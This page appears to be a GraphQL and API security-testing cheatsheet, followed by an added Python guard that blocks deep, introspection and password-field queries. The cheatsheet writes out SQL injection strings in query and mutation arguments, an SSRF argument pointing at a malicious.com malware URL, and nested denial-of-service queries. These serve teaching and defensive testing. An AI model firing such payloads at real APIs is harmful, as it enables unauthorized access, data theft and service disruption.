Neko

API and GraphQL

APIs are especially vulnerable to authentication and injection bugs, but since I've already covered those, this page goes over recon, introduces some bugs that are exclusive to APIs, and then covers GraphQL.

Last updated: March 5th, 2023

API

Recon

Common API bugs

GraphQL

Below is a practical cheatsheet with example commands; the endpoints, field names and arguments will need to be adjusted to match the target application.

  1. Enumerate GraphQL Schema:
    • Retrieve the GraphQL schema using introspection queries:
    • curl -X POST -H "Content-Type: application/json" -d '{"query":"query IntrospectionQuery { __schema { queryType { name } ... } }"}' <GraphQL_Endpoint_URL>
  2. Testing Query Operations:
    • Test for GraphQL injection:
    • query {
        user(id: "1' OR 1=1 --") {
          id
          name
          email
        }
      }
    • Test for excessive data exposure:
    • query {
        users {
          id
          name
          password
        }
      }
    • Test for nested query depth attacks:
    • query {
        user {
          posts {
            comments {
              user {
                posts {
                  comments {
                    # Continue nesting as required
                  }
                }
              }
            }
          }
        }
      }
    • Test for enumeration attacks:
    • query {
        user(role: ADMIN) {
          id
          name
          email
        }
      }
    • Test for access control vulnerabilities:
    • query {
        adminOnlyField
      }
    • Test for server-side request forgery (SSRF):
    • query {
        userProfilePicture(url: "http://malicious.com/malware") {
          url
        }
      }
  3. Testing Mutation Operations:
    • Test for unauthorized mutation operations:
    • mutation {
        createPost(title: "New Post", content: "This is a test post") {
          id
          title
        }
      }
    • Test for injection vulnerabilities:
    • mutation {
        updateProfile(name: "New Name', email = 'attacker@example.com' WHERE id = 1; --") {
          id
          name
          email
        }
      }
    • Test for data integrity issues:
    • mutation {
        deletePost(id: "1") {
          success
        }
      }
    • Test for rate limiting and throttling:
    • mutation {
        createPost(title: "New Post", content: "This is a test post") {
          id
          title
        }
      }
  4. Testing Subscription Operations:
    • Test for unauthorized subscription access:
    • subscription {
        newPost {
          id
          title
        }
      }
    • Test for injection vulnerabilities:
    • subscription {
        userLoggedIn(username: "admin' OR 1=1 --") {
          id
          username
        }
      }
    • Test for excessive resource consumption:
    • subscription {
        allPosts {
          id
          title
          content
        }
      }
  5. Testing Security Headers:
    • Use tools like curl or browser developer tools to check response headers:
    • curl -I <GraphQL_Endpoint_URL>
  6. Testing Authentication and Authorization:
    • Test for authentication bypass vulnerabilities:
    • query {
        user(id: "1") {
          id
          name
          email
        }
      }
    • Test for authorization bypass:
    • query {
        adminOnlyField
      }
    • Test for session management vulnerabilities:
    • mutation {
        login(username: "admin", password: "weak_password") {
          token
        }
      }
  7. Testing Error Handling:
    • Trigger an error and check the response:
    • query {
        nonexistentField
      }
    • Test for sensitive information exposure:
    • query {
        user(id: "123") {
          id
          name
          password
        }
      }
  8. Testing Performance and Resource Consumption:
    • Send a high-complexity query to test performance:
    • query {
        allPosts {
          id
          title
          comments {
            id
            content
          }
        }
      }
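The server-side counterpart to several of the tests above (the introspection query in step 1, the nested-depth and high-complexity queries in steps 2 and 8, and the `password` field selections in steps 2 and 7) is a guard that inspects a query before it reaches the executor. The following is an added example in Python, not code from this cheatsheet or from any GraphQL library: it scans the raw query text with a small tokenizer, so names such as `GuardPolicy`, `analyse` and the default limits are assumptions chosen for illustration, and the sample queries are the ones from the list above. Because it is a text-level heuristic rather than a schema-aware parser, it belongs in front of the real parser as a cheap first check, not in place of a proper complexity analyser.

```python
import re
from dataclasses import dataclass, field

# Tokens we care about: fragment spreads, directive markers, names, braces, parens, colons.
_TOKEN = re.compile(r'\.\.\.|@|[A-Za-z_][A-Za-z0-9_]*|[{}():]')
_KEYWORDS = {"query", "mutation", "subscription", "fragment", "on"}
# __typename is deliberately not listed: clients use it routinely and it leaks nothing.
_INTROSPECTION_ROOTS = {"__schema", "__type"}


@dataclass
class GuardPolicy:
    max_depth: int = 5               # deepest allowed nesting of selection sets (operation braces count as 1)
    max_fields: int = 50             # total field selections allowed in one document
    allow_introspection: bool = False
    denied_fields: frozenset = frozenset({"password", "passwordHash"})  # fields that must never be selectable


@dataclass
class Verdict:
    allowed: bool
    depth: int
    fields: int
    reasons: list = field(default_factory=list)


def _strip_strings_and_comments(query: str) -> str:
    """Blank out string literals and # comments so braces inside them are not counted."""
    out, i, n = [], 0, len(query)
    while i < n:
        c = query[i]
        if c == '"':
            if query.startswith('"""', i):                 # block string
                end = query.find('"""', i + 3)
                i = n if end == -1 else end + 3
            else:                                          # normal string, honour backslash escapes
                i += 1
                while i < n and query[i] != '"':
                    i += 2 if query[i] == '\\' else 1
                i += 1
            out.append(' ')
        elif c == '#':                                     # comment runs to end of line
            while i < n and query[i] != '\n':
                i += 1
        else:
            out.append(c)
            i += 1
    return ''.join(out)


def analyse(query: str, policy: GuardPolicy = GuardPolicy()) -> Verdict:
    """Return a Verdict describing whether the query document is within policy."""
    tokens = _TOKEN.findall(_strip_strings_and_comments(query))
    depth = max_depth = paren = fields = 0
    introspection, denied_hits, prev = False, set(), None
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok == '{':
            depth += 1
            max_depth = max(max_depth, depth)
        elif tok == '}':
            depth -= 1
        elif tok == '(':
            paren += 1
        elif tok == ')':
            paren -= 1
        elif paren == 0 and (tok[0].isalpha() or tok[0] == '_'):
            # A name is a field selection unless it is a keyword, an operation/fragment name,
            # a directive name, a fragment spread, or an alias (name followed by ':').
            is_field = (tok not in _KEYWORDS and prev not in _KEYWORDS
                        and prev not in ('@', '...') and nxt != ':')
            if is_field:
                fields += 1
                if tok in _INTROSPECTION_ROOTS:
                    introspection = True
                if tok in policy.denied_fields:
                    denied_hits.add(tok)
        prev = tok

    reasons = []
    if max_depth > policy.max_depth:
        reasons.append(f"depth {max_depth} exceeds limit {policy.max_depth}")
    if fields > policy.max_fields:
        reasons.append(f"{fields} field selections exceed limit {policy.max_fields}")
    if introspection and not policy.allow_introspection:
        reasons.append("introspection is disabled")
    for name in sorted(denied_hits):
        reasons.append(f"field '{name}' is not exposed")
    return Verdict(allowed=not reasons, depth=max_depth, fields=fields, reasons=reasons)


# Sample documents taken from the cheatsheet above (constructed inputs for the demo).
SAMPLE_NESTED = """query { user { posts { comments { user { posts { comments {
  # Continue nesting as required
} } } } } } }"""
SAMPLE_COMPLEX = "query { allPosts { id title comments { id content } } }"
SAMPLE_INTROSPECTION = 'query IntrospectionQuery { __schema { queryType { name } } }'
SAMPLE_EXPOSURE = "query { users { id name password } }"

if __name__ == "__main__":
    for label, q in [("nested", SAMPLE_NESTED), ("complex", SAMPLE_COMPLEX),
                     ("introspection", SAMPLE_INTROSPECTION), ("exposure", SAMPLE_EXPOSURE)]:
        v = analyse(q)
        print(f"{label:13} allowed={v.allowed} depth={v.depth} fields={v.fields} {v.reasons}")
```

With the default policy the seven-level nested query and the `password` selection are rejected and the introspection query is refused unless `GuardPolicy(allow_introspection=True)` is passed (which is what you would do in a development environment only), while the step 8 query passes at depth 3 with six field selections. The depth and field counts are also worth logging on every request, since a sudden rise in either is an early signal of the resource-consumption probing described in steps 2, 4 and 8.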